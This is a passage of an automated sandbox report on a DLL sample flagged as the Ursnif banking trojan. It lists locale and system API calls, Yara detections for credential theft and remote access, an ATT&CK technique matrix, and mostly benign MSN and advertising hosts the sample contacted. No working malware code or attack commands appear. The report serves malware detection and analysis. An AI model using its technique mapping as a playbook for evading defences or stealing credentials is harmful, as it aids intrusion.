Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E1DF84E
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E1DF679
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E1DF77F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E1DF553
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E1DF275
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E1DF300
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	0_2_6E197055
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E1DF0CA
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E1DF171
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E1DF1DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6E1DF679
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_6E1DEECF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,	3_2_6E1D46E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	3_2_6E1D3CC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	3_2_6E1DF275
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,	3_2_6E197055
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6E1DF84E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	3_2_6E1DF171
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	3_2_6E1DF1DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6E1DF679
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_6E1DEECF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6E1D46E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1D3CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1DF275
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6E197055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_6E1DF84E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1DF171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1DF1DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_6E1DEECF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E1D3CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_6E1DF84E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_6E1DF679
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_6E1D46E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_6E1DF77F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_6E1DF553
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E1DF275
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_6E1DF300
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	8_2_6E197055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_6E1DF0CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E1DF171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_6E1DF1DA

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1AA828 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E1AA828

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1DAAA5 _free,GetTimeZoneInformation,_free,

0_2_6E1DAAA5

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6E161850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

3_2_6E161850

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.6e160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.6e160000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.6e160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.6e160000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	System Information Discovery23	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	2.22.155.145	true	false	high
hblg.media.net	2.22.155.145	true	false	high
lg3.media.net	2.22.155.145	true	false	high
geolocation.onetrust.com	104.20.185.68	true	false	high
web.vortex.data.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.7.dr	false		high
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/news/other/weder-alltagstauglich-noch-kindgerecht-neben-firmen-bem%c3%a4ng	de-ch[1].htm.7.dr	false		high
http://searchads.msn.net/.cfm?&&kp=1&	~DF75532A51FCF86B61.TMP.5.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.7.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.7.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.7.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.7.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/publibike-m%c3%b6chte-in-der-stadt-z%c3%bcrich-eine-erfolgsgesc	de-ch[1].htm.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.7.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.7.dr	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
http://www.amazon.com/	msapplication.xml.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.7.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.7.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.7.dr	false		high
http://www.twitter.com/	msapplication.xml5.5.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/finanzen/top-stories/geld-ist-nicht-die-einzige-h%c3%bcrde-bei-der-suche-n	de-ch[1].htm.7.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
https://outlook.com/	de-ch[1].htm.7.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.7.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DF75532A51FCF86B61.TMP.5.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.7.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DF75532A51FCF86B61.TMP.5.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.7.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/mit-ihren-blauen-hinweistafeln-f%c3%bchrt-uns-anne-kustermann-v	de-ch[1].htm.7.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.7.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.7.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DF75532A51FCF86B61.TMP.5.dr	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.7.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.7.dr	false		high
http://www.reddit.com/	msapplication.xml4.5.dr	false		high
https://www.skype.com/	de-ch[1].htm.7.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.7.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562	de-ch[1].htm.7.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.7.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.7.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.7.dr	false		high
http://www.nytimes.com/	msapplication.xml3.5.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.7.dr	false		high
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	iab2Data[1].json.7.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.7.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	52-478955-68ddb2ab[1].js.7.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.7.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.7.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.7.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/news/other/die-neue-z%c3%bcrcher-steuererkl%c3%a4rung-sorgt-f%c3%bcr-begei	de-ch[1].htm.7.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DF75532A51FCF86B61.TMP.5.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.7.dr	false		high
https://twitter.com/	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/news/other/keine-nachtr%c3%a4gliche-therapie-f%c3%bcr-brutalen-vater/ar-BB	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.7.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.7.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.7.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.7.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.7.dr	false		high
https://outlook.live.com/calendar	52-478955-68ddb2ab[1].js.7.dr	false		high
https://onedrive.live.com/#qt=mru	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.7.dr	false		high
https://support.skype.com	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/news/other/die-jubil%c3%a4ums-millionen-fliessen-ins-corona-impfprogramm/a	de-ch[1].htm.7.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.7.dr	false		high
https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=	de-ch[1].htm.7.dr	false		high
http://www.youtube.com/	msapplication.xml7.5.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	~DF75532A51FCF86B61.TMP.5.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.7.dr	false		high
https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656	de-ch[1].htm.7.dr	false		high
http://www.wikipedia.com/	msapplication.xml6.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http	de-ch[1].htm.7.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm	de-ch[1].htm.7.dr	false		high
http://www.live.com/	msapplication.xml2.5.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.7.dr	false		high
https://login.skype.com/login/oauth/microsoft?client_id=738133	52-478955-68ddb2ab[1].js.7.dr	false		high
https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header	52-478955-68ddb2ab[1].js.7.dr	false		high
https://www.msn.com/de-ch/news/other/kommentar-doch-publibike-ist-aus-dem-z%c3%bcrcher-stadtbild-weg	de-ch[1].htm.7.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.185.68	geolocation.onetrust.com	United States		13335	CLOUDFLARENETUS	false
2.22.155.145	contextual.media.net	European Union		16625	AKAMAI-ASUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383181
Start date:	07.04.2021
Start time:	11:55:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	606d810b8ff92.pdf.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@23/82@6/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.4% (good quality ratio 10.6%) Quality average: 75.5% Quality standard deviation: 27.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.83.120.32, 204.79.197.203, 204.79.197.200, 13.107.21.200, 23.10.249.32, 23.10.249.18, 65.55.44.109, 152.199.19.161, 23.54.113.104, 23.0.174.185, 23.0.174.200, 13.107.4.50, 51.103.5.159, 168.61.161.212, 20.190.160.1, 20.190.160.131, 20.190.160.70, 20.190.160.68, 20.190.160.7, 20.190.160.3, 20.190.160.72, 20.190.160.133, 20.50.102.62, 52.147.198.201 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, ieonline.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, global.vortex.data.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, iecvlist.microsoft.com, wns.notify.trafficmanager.net, go.microsoft.com, Edge-Prod-ZRHr0.env.au.au-msedge.net, arc.trafficmanager.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, login.msa.msidentity.com, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, any.edge.bing.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, au.c-0001.c-msedge.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.20.185.68	syscshost.dll	Get hash	malicious	Browse
	DropDll.dll	Get hash	malicious	Browse
	lc.dll	Get hash	malicious	Browse
	msals.pumpl.dll	Get hash	malicious	Browse
	ofcRreui1e.dll	Get hash	malicious	Browse
	f6a1vvMXQa.dll	Get hash	malicious	Browse
	SKNANB_cr.dll	Get hash	malicious	Browse
	44285,5327891204.dll	Get hash	malicious	Browse
	KKczdO6rIb.dll	Get hash	malicious	Browse
	NiLuk5Ro1U.dll	Get hash	malicious	Browse
	ved9yoiofL.dll	Get hash	malicious	Browse
	fDCfU3rD47.dll	Get hash	malicious	Browse
	Hodas_1.dll	Get hash	malicious	Browse
	rpjF1fQBGQ.dll	Get hash	malicious	Browse
	3a939d5f1bfd54e904e9d69c05eafb6007af8b80334cc.dll	Get hash	malicious	Browse
	CkK3vbCWBt.dll	Get hash	malicious	Browse
	79f1a8f2d6ee1191a814af53a212a9bda8ce7c5aaccd2.dll	Get hash	malicious	Browse
	eeb0de4f4ecce356b213e09834c4b54bb942c51ed2a98.dll	Get hash	malicious	Browse
	e71a6d9573488d852c2a12fd73859fa893af21e4021fd.dll	Get hash	malicious	Browse
	cf7958a90e919c98464b8fb3b7a204af7f66d9ab82549.dll	Get hash	malicious	Browse
2.22.155.145	BsFMy70EjG.dll	Get hash	malicious	Browse
	k9NSoUT2pd.dll	Get hash	malicious	Browse
	ampcontrollerserverps.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hblg.media.net	syscshost.dll	Get hash	malicious	Browse	2.22.155.145
	syscshost.dll	Get hash	malicious	Browse	2.22.155.145
	lc.dll	Get hash	malicious	Browse	23.57.80.37
	msals.pumpl.dll	Get hash	malicious	Browse	184.30.24.22
	ofcRreui1e.dll	Get hash	malicious	Browse	104.76.200.23
	hostsvc.dll	Get hash	malicious	Browse	184.30.24.22
	f6a1vvMXQa.dll	Get hash	malicious	Browse	23.57.80.37
	SKNANB_cr.dll	Get hash	malicious	Browse	23.57.80.37
	44285,5327891204.dll	Get hash	malicious	Browse	23.57.80.37
	0M53tHsUDg.dll	Get hash	malicious	Browse	92.122.146.68
	ac1639e7343fa438e996763b0082e59cb0e3f9d0780ad.dll	Get hash	malicious	Browse	184.30.24.22
	KKczdO6rIb.dll	Get hash	malicious	Browse	23.57.80.37
	NiLuk5Ro1U.dll	Get hash	malicious	Browse	184.30.24.22
	8093WwNbBF.dll	Get hash	malicious	Browse	92.122.146.68
	ved9yoiofL.dll	Get hash	malicious	Browse	184.30.24.22
	zx4fXQBMR3.dll	Get hash	malicious	Browse	184.30.24.22
	Zwdq33D6nA.dll	Get hash	malicious	Browse	92.122.146.68
	VPNz5PCBKi.dll	Get hash	malicious	Browse	184.30.24.22
	RPtWoY2fZb.dll	Get hash	malicious	Browse	184.30.24.22
	o0qoa1i6vf.dll	Get hash	malicious	Browse	184.30.24.22
contextual.media.net	syscshost.dll	Get hash	malicious	Browse	2.22.155.145
	syscshost.dll	Get hash	malicious	Browse	2.22.155.145
	DropDll.dll	Get hash	malicious	Browse	23.57.80.37
	lc.dll	Get hash	malicious	Browse	23.57.80.37
	msals.pumpl.dll	Get hash	malicious	Browse	184.30.24.22
	ofcRreui1e.dll	Get hash	malicious	Browse	104.76.200.23
	hostsvc.dll	Get hash	malicious	Browse	184.30.24.22
	f6a1vvMXQa.dll	Get hash	malicious	Browse	23.57.80.37
	SKNANB_cr.dll	Get hash	malicious	Browse	23.57.80.37
	44285,5327891204.dll	Get hash	malicious	Browse	23.57.80.37
	0M53tHsUDg.dll	Get hash	malicious	Browse	92.122.146.68
	ac1639e7343fa438e996763b0082e59cb0e3f9d0780ad.dll	Get hash	malicious	Browse	184.30.24.22
	KKczdO6rIb.dll	Get hash	malicious	Browse	23.57.80.37
	NiLuk5Ro1U.dll	Get hash	malicious	Browse	184.30.24.22
	8093WwNbBF.dll	Get hash	malicious	Browse	92.122.146.68
	ved9yoiofL.dll	Get hash	malicious	Browse	184.30.24.22
	zx4fXQBMR3.dll	Get hash	malicious	Browse	184.30.24.22
	Zwdq33D6nA.dll	Get hash	malicious	Browse	92.122.146.68
	VPNz5PCBKi.dll	Get hash	malicious	Browse	184.30.24.22
	RPtWoY2fZb.dll	Get hash	malicious	Browse	184.30.24.22

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AKAMAI-ASUS	DropDll.dll	Get hash	malicious	Browse	23.57.80.37
	msals.pumpl.dll	Get hash	malicious	Browse	184.30.24.22
	nnrlOwKZlc.exe	Get hash	malicious	Browse	184.30.20.56
